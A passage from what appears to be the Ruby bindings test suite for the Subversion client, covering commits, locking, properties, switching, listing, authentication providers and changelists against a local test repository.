file = "sample.txt"
src = "sample\n"
path = File.join(@wc_path, file)
ctx = make_context(log)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
rev = ctx.commit(@wc_path).revision
ctx.up(@wc_path, rev - 1)
File.open(path, "w") {|f| f.print(src)}
assert_raise(Svn::Error::WC_OBSTRUCTED_UPDATE) do
ctx.up(@wc_path, rev)
end
Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1) do |access|
assert_raise(Svn::Error::WC_LOCKED) do
ctx.commit(@wc_path)
end
end
ctx.set_cancel_func do
raise Svn::Error::CANCELLED
end
Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1) do |access|
assert_raise(Svn::Error::CANCELLED) do
ctx.cleanup(@wc_path)
end
assert_raise(Svn::Error::WC_LOCKED) do
ctx.commit(@wc_path)
end
end
ctx.set_cancel_func(nil)
access = Svn::Wc::AdmAccess.open(nil, @wc_path, true, -1)
assert_nothing_raised do
ctx.cleanup(@wc_path)
end
assert_nothing_raised do
ctx.commit(@wc_path)
end
assert_raises(Svn::Error::SvnError) do
access.close
end
end
def test_relocate
log = "sample log"
file = "sample.txt"
src = "sample\n"
path = File.join(@wc_path, file)
ctx = make_context(log)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.commit(@wc_path)
assert_nothing_raised do
ctx.cat(path)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = @password
cred.may_save = true
end
ctx.relocate(@wc_path, @repos_uri, @repos_svnserve_uri)
ctx = make_context(log)
assert_raises(Svn::Error::AuthnNoProvider) do
ctx.cat(path)
end
end
def test_resolved
log = "sample log"
file = "sample.txt"
dir = "dir"
src1 = "before\n"
src2 = "after\n"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {}
ctx.add(path)
rev1 = ctx.ci(@wc_path).revision
File.open(path, "w") {|f| f.print(src1)}
rev2 = ctx.ci(@wc_path).revision
ctx.up(@wc_path, rev1)
File.open(path, "w") {|f| f.print(src2)}
ctx.up(@wc_path)
assert_raises(Svn::Error::WcFoundConflict) do
ctx.ci(@wc_path)
end
ctx.resolved(dir_path, false)
assert_raises(Svn::Error::WcFoundConflict) do
ctx.ci(@wc_path)
end
ctx.resolved(dir_path)
info = nil
assert_nothing_raised do
info = ctx.ci(@wc_path)
end
assert_not_nil(info)
assert_equal(rev2 + 1, info.revision)
end
def test_copy
log = "sample log"
src = "source\n"
file1 = "sample1.txt"
file2 = "sample2.txt"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src)}
ctx.add(path1)
ctx.ci(@wc_path)
ctx.cp(path1, path2)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
ctx.ci(@wc_path)
assert_equal([path2].sort,
infos.collect{|path, notify| path}.sort)
path2_notify = infos.assoc(path2)[1]
assert(path2_notify.commit_added?)
assert_equal(File.open(path1) {|f| f.read},
File.open(path2) {|f| f.read})
end
def test_move
log = "sample log"
src = "source\n"
file1 = "sample1.txt"
file2 = "sample2.txt"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src)}
ctx.add(path1)
ctx.ci(@wc_path)
ctx.mv(path1, path2)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
ctx.ci(@wc_path)
assert_equal([path1, path2].sort,
infos.collect{|path, notify| path}.sort)
path1_notify = infos.assoc(path1)[1]
assert(path1_notify.commit_deleted?)
path2_notify = infos.assoc(path2)[1]
assert(path2_notify.commit_added?)
assert_equal(src, File.open(path2) {|f| f.read})
end
def test_move_force
log = "sample log"
src1 = "source1\n"
src2 = "source2\n"
file1 = "sample1.txt"
file2 = "sample2.txt"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src1)}
ctx.add(path1)
ctx.ci(@wc_path)
File.open(path1, "w") {|f| f.print(src2)}
assert_nothing_raised do
ctx.mv(path1, path2)
end
ctx.revert([path1, path2])
FileUtils.rm(path2)
File.open(path1, "w") {|f| f.print(src2)}
assert_nothing_raised do
ctx.mv_f(path1, path2)
end
notifies = []
ctx.set_notify_func do |notify|
notifies << notify
end
ctx.ci(@wc_path)
paths = notifies.collect do |notify|
notify.path
end
assert_equal([path1, path2, path2].sort, paths.sort)
deleted_paths = notifies.find_all do |notify|
notify.commit_deleted?
end.collect do |notify|
notify.path
end
assert_equal([path1].sort, deleted_paths.sort)
added_paths = notifies.find_all do |notify|
notify.commit_added?
end.collect do |notify|
notify.path
end
assert_equal([path2].sort, added_paths.sort)
postfix_txdelta_paths = notifies.find_all do |notify|
notify.commit_postfix_txdelta?
end.collect do |notify|
notify.path
end
assert_equal([path2].sort, postfix_txdelta_paths.sort)
assert_equal(src2, File.open(path2) {|f| f.read})
end
def test_prop
log = "sample log"
dir = "dir"
file = "sample.txt"
dir_path = File.join(@wc_path, dir)
dir_uri = "#{@repos_uri}/#{dir}"
path = File.join(dir_path, file)
uri = "#{dir_uri}/#{file}"
prop_name = "sample-prop"
prop_value = "sample value"
invalid_mime_type_prop_value = "image"
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {}
ctx.add(path)
ctx.commit(@wc_path)
assert_equal({}, ctx.prop_get(prop_name, path))
ctx.prop_set(prop_name, prop_value, path)
ctx.commit(@wc_path)
assert_equal({uri => prop_value}, ctx.pget(prop_name, path))
ctx.prop_del(prop_name, path)
ctx.commit(@wc_path)
assert_equal({}, ctx.pg(prop_name, path))
ctx.ps(prop_name, prop_value, path)
ctx.commit(@wc_path)
assert_equal({uri => prop_value}, ctx.pg(prop_name, path))
ctx.ps(prop_name, nil, path)
ctx.commit(@wc_path)
assert_equal({}, ctx.pg(prop_name, path))
ctx.up(@wc_path)
ctx.ps(prop_name, prop_value, dir_path)
ctx.ci(@wc_path)
assert_equal({
dir_uri => prop_value,
uri => prop_value,
},
ctx.pg(prop_name, dir_path))
ctx.up(@wc_path)
ctx.pdel(prop_name, dir_path, false)
ctx.ci(@wc_path)
assert_equal({uri => prop_value}, ctx.pg(prop_name, dir_path))
ctx.up(@wc_path)
ctx.pd(prop_name, dir_path)
ctx.ci(@wc_path)
assert_equal({}, ctx.pg(prop_name, dir_path))
ctx.up(@wc_path)
ctx.ps(prop_name, prop_value, dir_path, false)
ctx.ci(@wc_path)
assert_equal({dir_uri => prop_value}, ctx.pg(prop_name, dir_path))
assert_raises(Svn::Error::BadMimeType) do
ctx.ps(Svn::Core::PROP_MIME_TYPE,
invalid_mime_type_prop_value,
path)
end
ctx.cleanup(@wc_path)
assert_nothing_raised do
ctx.ps(Svn::Core::PROP_MIME_TYPE,
invalid_mime_type_prop_value,
path, false, true)
end
ctx.commit(@wc_path)
assert_equal({uri => invalid_mime_type_prop_value},
ctx.pg(Svn::Core::PROP_MIME_TYPE, path))
end
def test_prop_list
log = "sample log"
dir = "dir"
file = "sample.txt"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
dir_uri = "#{@repos_uri}/#{dir}"
uri = "#{dir_uri}/#{file}"
name1 = "name1"
name2 = "name2"
value1 = "value1"
value2 = "value2"
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {}
ctx.add(path)
ctx.ci(@wc_path)
assert_equal([], ctx.prop_list(path))
ctx.ps(name1, value1, path)
ctx.ci(@wc_path)
assert_equal([uri], ctx.prop_list(path).collect{|item| item.node_name})
assert_equal([{name1 => value1}],
ctx.plist(path).collect{|item| item.prop_hash})
assert_equal([value1], ctx.pl(path).collect{|item| item[name1]})
ctx.up(@wc_path)
ctx.ps(name2, value2, dir_path)
ctx.ci(@wc_path)
assert_equal([uri, dir_uri].sort,
ctx.prop_list(dir_path).collect{|item| item.name})
prop_list = ctx.plist(dir_path).collect{|item| [item.name, item.props]}
props = prop_list.assoc(uri)[1]
dir_props = prop_list.assoc(dir_uri)[1]
assert_equal({name1 => value1, name2 => value2}, props)
assert_equal({name2 => value2}, dir_props)
end
def recurse_and_depth_choices
[false, true, 'empty', 'files', 'immediates', 'infinity']
end
def test_file_prop
setup_greek_tree
log = "sample log"
ctx = make_context(log)
# when no props set, everything is empty
recurse_and_depth_choices.each do |rd|
assert_equal([],
ctx.prop_list(@greek.path(:mu), nil, nil, rd),
"prop_list with Depth '#{rd}'")
end
recurse_and_depth_choices.each do |rd|
assert_equal({},
ctx.prop_get(rd.to_s, @greek.path(:mu), nil, nil, rd),
"prop_get with Depth '#{rd}'")
end
# set some props
recurse_and_depth_choices.each do |rd|
ctx.prop_set(rd.to_s, rd.to_s, @greek.path(:mu), rd)
end
ctx.commit(@greek.path(:mu))
# get the props
recurse_and_depth_choices.each do |rd|
assert_equal({@greek.uri(:mu) => rd.to_s},
ctx.prop_get(rd.to_s, @greek.path(:mu), nil, nil, rd),
"prop_get with Depth '#{rd}'")
end
prop_hash = {}
recurse_and_depth_choices.each {|rd| prop_hash[rd.to_s] = rd.to_s}
# list the props
recurse_and_depth_choices.each do |rd|
props = ctx.prop_list(@greek.path(:mu), nil, nil, rd)
assert_equal([@greek.uri(:mu)],
props.collect {|item| item.node_name},
"prop_list (node_name) with Depth '#{rd}'")
props = ctx.plist(@greek.path(:mu), nil, nil, rd)
assert_equal([prop_hash],
props.collect {|item| item.prop_hash},
"prop_list (prop_hash) with Depth '#{rd}'")
recurse_and_depth_choices.each do |rd1|
props = ctx.plist(@greek.path(:mu), nil, nil, rd)
assert_equal([rd1.to_s],
props.collect {|item| item[rd1.to_s]},
"prop_list (#{rd1.to_s}]) with Depth '#{rd}'")
end
end
end
def test_dir_prop
setup_greek_tree
log = "sample log"
ctx = make_context(log)
# when no props set, everything is empty
recurse_and_depth_choices.each do |rd|
assert_equal([],
ctx.prop_list(@greek.path(:b), nil, nil, rd),
"prop_list with Depth '#{rd}'")
end
recurse_and_depth_choices.each do |rd|
assert_equal({},
ctx.prop_get(rd.to_s, @greek.path(:b), nil, nil, rd),
"prop_get with Depth '#{rd}'")
end
# set some props with various depths
recurse_and_depth_choices.each do |rd|
ctx.prop_set(rd.to_s, rd.to_s, @greek.path(:b), rd)
end
ctx.commit(@greek.path(:b))
expected_props = {
true => [:beta, :b, :lambda, :e, :f, :alpha],
false => [:b],
'empty' => [:b],
'files' => [:b, :lambda],
'immediates' => [:b, :lambda, :e, :f],
'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
}
paths = [:b, :e, :alpha, :beta, :f, :lambda]
# how are the props set?
recurse_and_depth_choices.each do |rd|
paths.each do |path|
if expected_props[rd].include?(path)
expected = {@greek.uri(path) => rd.to_s}
else
expected = {}
end
assert_equal(expected,
ctx.prop_get(rd.to_s, @greek.path(path), nil, nil, false),
"prop_get #{@greek.resolve(path)} with Depth '#{rd}'")
end
end
recurse_and_depth_choices.each do |rd_for_prop|
recurse_and_depth_choices.each do |rd_for_depth|
expected = {}
expected_paths = expected_props[rd_for_depth]
expected_paths &= expected_props[rd_for_prop]
expected_paths.each do |path|
expected[@greek.uri(path)] = rd_for_prop.to_s
end
assert_equal(expected,
ctx.prop_get(rd_for_prop.to_s, @greek.path(:b),
nil, nil, rd_for_depth),
"prop_get '#{rd_for_prop}' with Depth '#{rd_for_depth}'")
end
end
recurse_and_depth_choices.each do |rd|
props = ctx.prop_list(@greek.path(:b), nil, nil, rd)
assert_equal(expected_props[rd].collect {|path| @greek.uri(path)}.sort,
props.collect {|item| item.node_name}.sort,
"prop_list (node_name) with Depth '#{rd}'")
end
end
def test_cat
log = "sample log"
src1 = "source1\n"
src2 = "source2\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src1)}
ctx = make_context(log)
ctx.add(path)
commit_info = ctx.commit(@wc_path)
rev1 = commit_info.revision
assert_equal(normalize_line_break(src1), ctx.cat(path, rev1))
assert_equal(normalize_line_break(src1), ctx.cat(path))
File.open(path, "w") {|f| f.print(src2)}
commit_info = ctx.commit(@wc_path)
rev2 = commit_info.revision
assert_equal(normalize_line_break(src1), ctx.cat(path, rev1))
assert_equal(normalize_line_break(src2), ctx.cat(path, rev2))
assert_equal(normalize_line_break(src2), ctx.cat(path))
end
def test_lock
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
ctx.commit(@wc_path)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
ctx.lock(path)
assert_equal([file], infos.collect{|path, notify| path})
file_notify = infos.assoc(file)[1]
assert(file_notify.locked?)
end
def test_unlock
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
ctx.commit(@wc_path)
ctx.lock(path)
infos = []
ctx.set_notify_func do |notify|
infos << [notify.path, notify]
end
ctx.unlock(path)
assert_equal([file], infos.collect{|path, notify| path})
file_notify = infos.assoc(file)[1]
assert(file_notify.unlocked?)
end
def test_info
log = "sample log"
ctx = make_context(log)
repos_base = File.basename(@repos_path)
infos = []
ctx.info(@wc_path) do |path, info|
infos << [path, info]
end
assert_equal([repos_base],
infos.collect{|path, info| path})
top_info = infos.assoc(repos_base)[1]
assert_equal(@repos_uri, top_info.url)
end
def test_info_with_depth
setup_greek_tree
log = "sample log"
ctx = make_context(log)
recurse_and_depth_choices.each do |rd|
ctx.info(@greek.path(:mu),nil,nil,rd) do |path, info|
assert_equal @greek.uri(:mu), info.URL
end
end
expected_info_by_depth = {
true => [:beta, :b, :lambda, :e, :f, :alpha],
false => [:b],
'empty' => [:b],
'files' => [:b, :lambda],
'immediates' => [:b, :lambda, :e, :f],
'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
}
recurse_and_depth_choices.each do |rd|
urls = []
ctx.info(@greek.path(:b),nil,nil,rd) do |path, info|
urls << info.URL
end
assert_equal expected_info_by_depth[rd].map{|s| @greek.uri(s)}.sort,
urls.sort,
"depth '#{rd}"
end
end
def test_url_from_path
log = "sample log"
ctx = make_context(log)
assert_equal(@repos_uri, ctx.url_from_path(@wc_path))
assert_equal(@repos_uri, Svn::Client.url_from_path(@wc_path))
end
def test_uuid
log = "sample log"
ctx = make_context(log)
Svn::Wc::AdmAccess.open(nil, @wc_path, false, 0) do |adm|
assert_equal(ctx.uuid_from_url(@repos_uri),
ctx.uuid_from_path(@wc_path, adm))
end
end
def test_open_ra_session
log = "sample log"
ctx = make_context(log)
assert_instance_of(Svn::Ra::Session, ctx.open_ra_session(@repos_uri))
end
def test_revprop
log = "sample log"
new_log = "new sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
info = ctx.commit(@wc_path)
assert_equal([
{
Svn::Core::PROP_REVISION_AUTHOR => @author,
Svn::Core::PROP_REVISION_DATE => info.date,
Svn::Core::PROP_REVISION_LOG => log,
},
info.revision
],
ctx.revprop_list(@repos_uri, info.revision))
assert_equal([log, info.revision],
ctx.revprop_get(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(log,
ctx.revprop(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(info.revision,
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
@repos_uri, info.revision))
assert_equal([new_log, info.revision],
ctx.rpget(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(new_log,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal([
{
Svn::Core::PROP_REVISION_AUTHOR => @author,
Svn::Core::PROP_REVISION_DATE => info.date,
Svn::Core::PROP_REVISION_LOG => new_log,
},
info.revision
],
ctx.rplist(@repos_uri, info.revision))
assert_equal(info.revision,
ctx.revprop_del(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal([nil, info.revision],
ctx.rpg(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(nil,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(info.revision,
ctx.rpset(Svn::Core::PROP_REVISION_LOG, new_log,
@repos_uri, info.revision))
assert_equal(new_log,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal(info.revision,
ctx.rps(Svn::Core::PROP_REVISION_LOG, nil,
@repos_uri, info.revision))
assert_equal(nil,
ctx.rp(Svn::Core::PROP_REVISION_LOG,
@repos_uri, info.revision))
assert_equal([
{
Svn::Core::PROP_REVISION_AUTHOR => @author,
Svn::Core::PROP_REVISION_DATE => info.date,
},
info.revision
],
ctx.rpl(@repos_uri, info.revision))
end
def test_export
log = "sample log"
src = "source\n"
file = "sample.txt"
dir = "sample"
dir_path = File.join(@wc_path, dir)
path = File.join(dir_path, file)
tmp_base_path = File.join(@tmp_path, "tmp")
tmp_dir_path = File.join(tmp_base_path, dir)
tmp_path = File.join(tmp_dir_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
rev = ctx.ci(@wc_path).revision
assert_equal(rev, ctx.export(@repos_uri, tmp_base_path))
assert_equal(src, File.open(tmp_path) {|f| f.read})
end
def test_ls
log = "sample log"
src = "source\n"
file = "sample.txt"
dir = "sample"
dir_path = File.join(@wc_path, dir)
path = File.join(@wc_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
rev = ctx.ci(@wc_path).revision
dirents, locks = ctx.ls(@wc_path, rev)
assert_equal([dir, file].sort, dirents.keys.sort)
dir_dirent = dirents[dir]
assert(dir_dirent.directory?)
file_dirent = dirents[file]
assert(file_dirent.file?)
end
def test_list
log = "sample log"
src = "source\n"
file = "sample.txt"
dir = "sample"
prop_name = "sample-prop"
prop_value = "sample value"
dir_path = File.join(@wc_path, dir)
path = File.join(@wc_path, file)
ctx = make_context(log)
ctx.mkdir(dir_path)
File.open(path, "w") {|f| f.print(src)}
ctx.add(path)
ctx.prop_set(prop_name, prop_value, path)
rev = ctx.ci(@wc_path).revision
entries = []
ctx.list(@wc_path, rev) do |path, dirent, lock, abs_path|
entries << [path, dirent, lock, abs_path]
end
paths = entries.collect do |path, dirent, lock, abs_path|
[path, abs_path]
end
assert_equal([["", "/"], [dir, "/"], [file, "/"]].sort, paths.sort)
entries.each do |path, dirent, lock, abs_path|
case path
when dir, ""
assert(dirent.directory?)
assert_false(dirent.have_props?)
when file
assert(dirent.file?)
assert_true(dirent.have_props?)
else
flunk
end
end
end
def test_list_with_depth
setup_greek_tree
log = "sample log"
ctx = make_context(log)
expected_lists_by_depth = {
true => [:beta, :b, :lambda, :e, :f, :alpha],
false => [:b, :lambda, :e, :f],
'empty' => [:b],
'files' => [:b, :lambda],
'immediates' => [:b, :lambda, :e, :f],
'infinity' => [:beta, :b, :lambda, :e, :f, :alpha],
}
recurse_and_depth_choices.each do |rd|
paths = []
ctx.list(@greek.path(:b), 'head' ,nil, rd) do |path, dirent, lock, abs_path|
paths << (path.empty? ? abs_path : File.join(abs_path, path))
end
assert_equal(expected_lists_by_depth[rd].map{|s| "/#{@greek.resolve(s)}"}.sort,
paths.sort,
"depth '#{rd}")
end
end
def test_switch
log = "sample log"
trunk_src = "trunk source\n"
tag_src = "tag source\n"
file = "sample.txt"
file = "sample.txt"
trunk_dir = "trunk"
tag_dir = "tags"
tag_name = "0.0.1"
trunk_repos_uri = "#{@repos_uri}/#{trunk_dir}"
tag_repos_uri = "#{@repos_uri}/#{tag_dir}/#{tag_name}"
trunk_dir_path = File.join(@wc_path, trunk_dir)
tag_dir_path = File.join(@wc_path, tag_dir)
tag_name_dir_path = File.join(@wc_path, tag_dir, tag_name)
trunk_path = File.join(trunk_dir_path, file)
tag_path = File.join(tag_name_dir_path, file)
path = File.join(@wc_path, file)
ctx = make_context(log)
ctx.mkdir(trunk_dir_path)
File.open(trunk_path, "w") {|f| f.print(trunk_src)}
ctx.add(trunk_path)
trunk_rev = ctx.commit(@wc_path).revision
ctx.mkdir(tag_dir_path, tag_name_dir_path)
File.open(tag_path, "w") {|f| f.print(tag_src)}
ctx.add(tag_path)
tag_rev = ctx.commit(@wc_path).revision
assert_equal(youngest_rev, ctx.switch(@wc_path, trunk_repos_uri))
assert_equal(normalize_line_break(trunk_src), ctx.cat(path))
assert_equal(youngest_rev, ctx.switch(@wc_path, tag_repos_uri))
assert_equal(normalize_line_break(tag_src), ctx.cat(path))
notify_info = []
ctx.set_notify_func do |notify|
notify_info << [notify.path, notify.action]
end
assert_equal(trunk_rev, ctx.switch(@wc_path, trunk_repos_uri, trunk_rev))
assert_equal(normalize_line_break(trunk_src), ctx.cat(path))
assert_equal([
[path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
[@wc_path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
[@wc_path, Svn::Wc::NOTIFY_UPDATE_COMPLETED],
],
notify_info)
notify_info.clear
assert_equal(tag_rev, ctx.switch(@wc_path, tag_repos_uri, tag_rev))
assert_equal(normalize_line_break(tag_src), ctx.cat(path))
assert_equal([
[path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
[@wc_path, Svn::Wc::NOTIFY_UPDATE_UPDATE],
[@wc_path, Svn::Wc::NOTIFY_UPDATE_COMPLETED],
],
notify_info)
end
def test_authentication
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
svnserve_uri = "#{@repos_svnserve_uri}/#{file}"
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
ctx.commit(@wc_path)
ctx = Svn::Client::Context.new
assert_raises(Svn::Error::AuthnNoProvider) do
ctx.cat(svnserve_uri)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = "wrong-#{@author}"
cred.password = @password
cred.may_save = false
end
assert_raises(Svn::Error::RaNotAuthorized) do
ctx.cat(svnserve_uri)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = "wrong-#{@password}"
cred.may_save = false
end
assert_raises(Svn::Error::RaNotAuthorized) do
ctx.cat(svnserve_uri)
end
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = @password
cred.may_save = false
end
assert_equal(normalize_line_break(src), ctx.cat(svnserve_uri))
end
def assert_simple_provider(method)
log = "sample log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
svnserve_uri = "#{@repos_svnserve_uri}/#{file}"
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
setup_auth_baton(ctx.auth_baton)
ctx.add(path)
ctx.commit(@wc_path)
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.send(method)
assert_raises(Svn::Error::RaNotAuthorized) do
ctx.cat(svnserve_uri)
end
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.send(method)
ctx.add_simple_prompt_provider(0) do |cred, realm, username, may_save|
cred.username = @author
cred.password = @password
end
assert_equal(normalize_line_break(src), ctx.cat(svnserve_uri))
end
def test_simple_provider
assert_simple_provider(:add_simple_provider)
end
if Svn::Core.respond_to?(:auth_get_windows_simple_provider)
def test_windows_simple_provider
assert_simple_provider(:add_windows_simple_provider)
end
end
if Svn::Core.respond_to?(:auth_get_keychain_simple_provider)
def test_keychain_simple_provider
assert_simple_provider(:add_keychain_simple_provider)
end
end
def test_username_provider
log = "sample log"
new_log = "sample new log"
src = "source\n"
file = "sample.txt"
path = File.join(@wc_path, file)
repos_uri = "#{@repos_uri}/#{file}"
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
ctx.add(path)
info = ctx.commit(@wc_path)
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = @author
ctx.add_username_provider
assert_nothing_raised do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = "#{@author}-NG"
ctx.add_username_provider
assert_raise(Svn::Error::REPOS_HOOK_FAILURE) do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = nil
ctx.add_username_prompt_provider(0) do |cred, realm, may_save|
end
assert_raise(Svn::Error::REPOS_HOOK_FAILURE) do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
ctx = Svn::Client::Context.new
setup_auth_baton(ctx.auth_baton)
ctx.auth_baton[Svn::Core::AUTH_PARAM_DEFAULT_USERNAME] = nil
ctx.add_username_prompt_provider(0) do |cred, realm, may_save|
cred.username = @author
end
assert_nothing_raised do
ctx.revprop_set(Svn::Core::PROP_REVISION_LOG, new_log,
repos_uri, info.revision)
end
end
def test_add_providers
ctx = Svn::Client::Context.new
assert_nothing_raised do
ctx.add_ssl_client_cert_file_provider
ctx.add_ssl_client_cert_pw_file_provider
ctx.add_ssl_server_trust_file_provider
if Svn::Core.respond_to?(:auth_get_windows_ssl_server_trust_provider)
ctx.add_windows_ssl_server_trust_provider
end
end
end
def test_commit_item
assert_raise(NoMethodError) do
Svn::Client::CommitItem.new
end
assert_raise(NoMethodError) do
Svn::Client::CommitItem2.new
end
item = Svn::Client::CommitItem3.new
assert_kind_of(Svn::Client::CommitItem3, item)
url = "xxx"
item.url = url
assert_equal(url, item.dup.url)
end
def test_log_msg_func_commit_items
log = "sample log"
file = "file"
file2 = "file2"
src = "source"
path = File.join(@wc_path, file)
repos_uri2 = "#{@repos_uri}/#{file2}"
File.open(path, "w") {|f| f.print(src)}
ctx = make_context(log)
items = nil
ctx.set_log_msg_func do |items|
[true, log]
end
ctx.add(path)
ctx.prop_set(Svn::Core::PROP_MIME_TYPE, "text/plain", path)
ctx.commit(@wc_path)
assert_equal([[]], items.collect {|item| item.wcprop_changes})
assert_equal([[]], items.collect {|item| item.incoming_prop_changes})
assert_equal([nil], items.collect {|item| item.outgoing_prop_changes})
items = nil
ctx.cp(path, repos_uri2)
assert_equal([nil], items.collect {|item| item.wcprop_changes})
assert_equal([nil], items.collect {|item| item.incoming_prop_changes})
assert_equal([nil], items.collect {|item| item.outgoing_prop_changes})
end
def test_log_msg_func_cancel
log = "sample log"
dir = "dir"
dir_path = File.join(@wc_path, dir)
ctx = make_context(log)
ctx.set_log_msg_func do |items|
raise Svn::Error::Cancelled
end
ctx.mkdir(dir_path)
assert_raise(Svn::Error::Cancelled) do
ctx.commit(@wc_path)
end
end
def test_set_config
log = "sample log"
ctx = make_context(log)
options = {
"groups" => {"collabnet" => "svn.collab.net"},
"collabnet" => {
"http-proxy-host" => "proxy",
"http-proxy-port" => "8080",
},
}
servers_config_file = File.join(@config_path,
Svn::Core::CONFIG_CATEGORY_SERVERS)
File.open(servers_config_file, "w") do |file|
options.each do |section, values|
file.puts("[#{section}]")
values.each do |key, value|
file.puts("#{key} = #{value}")
end
end
end
config = Svn::Core::Config.config(@config_path)
assert_nil(ctx.config)
assert_equal(options, config[Svn::Core::CONFIG_CATEGORY_SERVERS].to_hash)
ctx.config = config
assert_equal(options,
ctx.config[Svn::Core::CONFIG_CATEGORY_SERVERS].to_hash)
end
def test_context_mimetypes_map
context = Svn::Client::Context.new
assert_nil(context.mimetypes_map)
context.mimetypes_map = {"txt" => "text/plain"}
assert_equal({"txt" => "text/plain"}, context.mimetypes_map)
end
def assert_changelists
log = "sample log"
file1 = "hello1.txt"
file2 = "hello2.txt"
src = "Hello"
changelist1 = "XXX"
changelist2 = "YYY"
path1 = File.join(@wc_path, file1)
path2 = File.join(@wc_path, file2)
ctx = make_context(log)
File.open(path1, "w") {|f| f.print(src)}
File.open(path2, "w") {|f| f.print(src)}
ctx.add(path1)
ctx.add(path2)
ctx.commit(@wc_path)
assert_equal({}, yield(ctx, changelist1))
assert_equal({nil=>[@wc_path,path1,path2]}, yield(ctx, nil))
assert_equal({}, yield(ctx, []))
assert_equal({}, yield(ctx, [changelist1]))
assert_equal({}, yield(ctx, [changelist2]))
ctx.add_to_changelist(changelist1, path1)
assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
assert_equal({changelist1=>[path1],nil=>[@wc_path,path2]}, yield(ctx, nil))
assert_equal({}, yield(ctx, []))
assert_equal({changelist1=>[path1]}, yield(ctx, [changelist1]))
assert_equal({}, yield(ctx, [changelist2]))
assert_equal({}, yield(ctx, changelist2))
ctx.add_to_changelist(changelist2, [path1, path2])
assert_equal({changelist2=>[path1, path2]}, yield(ctx, changelist2))
assert_equal({}, yield(ctx, changelist1))
ctx.add_to_changelist(changelist1, [path1, path2])
assert_equal({changelist1=>[path1, path2]}, yield(ctx, changelist1))
assert_equal({}, yield(ctx, changelist2))
ctx.remove_from_changelists(changelist1, path1)
assert_equal({changelist1=>[path2]}, yield(ctx, changelist1))
ctx.remove_from_changelists(changelist1, [path2])
assert_equal({}, yield(ctx, changelist1))
ctx.add_to_changelist(changelist1, path1)
ctx.add_to_changelist(changelist2, path2)
assert_equal({changelist1=>[path1]}, yield(ctx, changelist1))
assert_equal({changelist2=>[path2]}, yield(ctx, changelist2))
